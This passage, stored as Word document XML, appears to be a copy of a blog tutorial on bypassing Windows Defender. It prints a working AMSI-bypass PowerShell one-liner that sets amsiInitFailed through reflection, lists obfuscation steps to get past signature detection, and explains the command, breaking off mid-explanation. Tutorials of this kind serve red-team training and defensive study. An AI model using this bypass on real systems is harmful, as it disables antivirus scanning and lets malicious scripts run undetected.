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00C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Bypassing Windows Defender</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing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By </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="0055600C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Bhaskar</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="0055600C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve"> Pal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing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Posted </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>May 14, 2023</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Updated </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>May 14, 2023</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10 min</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F73A4" w:rsidRDefault="009F73A4" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F73A4" w:rsidRDefault="009F73A4" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="009018DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://0xstarlight.github.io/posts/Bypassing-Windows-Defender/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009F73A4" w:rsidRPr="0055600C" w:rsidRDefault="009F73A4" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ADD8E6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Introduction</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Greetings, everyone </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>👋</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. In this brief article, I will outline a manual obfuscation technique for bypassing Windows Defender. Specifically, I will cover how to patch the Antimalware Scan Interface and disable Event Tracing for Windows to evade detection. Additionally, I will demonstrate how to combine both methods for maximum effectiveness and provide guidance on using this approach.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1"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Throughout the article, I will use </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="0055600C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>AmsiTrigger</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="0055600C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Invoke-obfuscation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. These tools will help to identify the malicious scripts and help obfuscate them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing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pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="ADD8E6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Bypassing AV Signatures PowerShell</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Windows Defender Antimalware Scan Interface (AMSI) is a security feature that is built into Windows 10 and Windows Server 2016 and later versions. AMSI is designed to provide enhanced malware protection by allowing antivirus and other security solutions to scan script-based attacks and other suspicious code before they execute on a system.</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By disabling or AMSI, attackers can download malicious scripts in memory on the systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">
      <w:pPr>
        <w:spacing w:beforeAutospacing="1"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Original Payload for AMSI bypass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spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>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[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)</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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="90EE90"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Methodology - Manual</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055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Scan using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AMSITrigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055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Modify the detected code snippet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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Base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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lastRenderedPageBreak/>
        <w:t>Hex</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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5600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600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Reverse String</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055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Rescan using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AMSITrigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or Download a test ps1 script in memory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055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Repeat the steps 2 &amp; 3 till we get a result as “AMSI_RESULT_NOT_DETECTED” or “Blank”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="90EE90"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Understanding the command</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This command is used to modify the behavior of the Anti-Malware Scan Interface (AMSI) in PowerShell. Specifically, it sets a private, static field within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>System.Management.Automation.AmsiUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> class called </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>amsiInitFailed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to true, which indicates that the initialization of AMSI has failed.</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Here is a breakdown of the command and what each part does:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="00556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600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Ref].</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Assembly.GetType(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'System.Management.Automation.AmsiUtils')</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: This first part of the command uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[Ref]</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> type accelerator to get a reference to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.Management.Automation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> assembly and then uses the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetType</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method to get a reference to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.Management.Automation.AmsiUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> class.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="0055600C">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55600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.Management.Automation.AmsiUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a part of the PowerShell scripting language and is used to interact with the Anti-Malware Scan Interface (AMSI) on Windows operating systems. AMSI is a security feature that allows software to integrate with antivirus and other security products to scan and detect malicious content in scripts and other files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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While </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.Management.Automation.AmsiUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> itself is not inherently malicious, it can be flagged as such if it is being used in a context that appears suspicious to antivirus or other security software. For example, malware authors may use PowerShell scripts that leverage AMSI to bypass traditional antivirus detection and execute malicious code on a system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="005560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Thus, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System.Management.Automation.AmsiUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> may be flagged as malicious if it is being used in a context that appears to be part of a malware attack or if it is being used in a way that violates security policies on a system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="00556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600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetField</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gram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amsiInitFailed</w:t>
      </w:r>
      <w:proofErr w:type="spell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NonPublic,Static</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This part of the command uses the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GetField</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method to get a reference to the private, static field within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>System.Management.Automation.AmsiUtils</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> class called </w:t>
      </w:r>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amsiInitFailed</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The </w:t>
      </w:r>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NonPublic</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,Static</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> argument specifies that the method should retrieve a non-public and static field.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0055600C" w:rsidRPr="0055600C" w:rsidRDefault="0055600C" w:rsidP="00556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600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SetValue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gram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null,$true</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Finally, this part of the command uses the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SetValue</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method to set the value of the </w:t>
      </w:r>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amsiInitFailed</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field to true. The </w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$null</w:t>
      </w:r>
      <w:r w:rsidRPr="0055600C">
        <w:rPr>
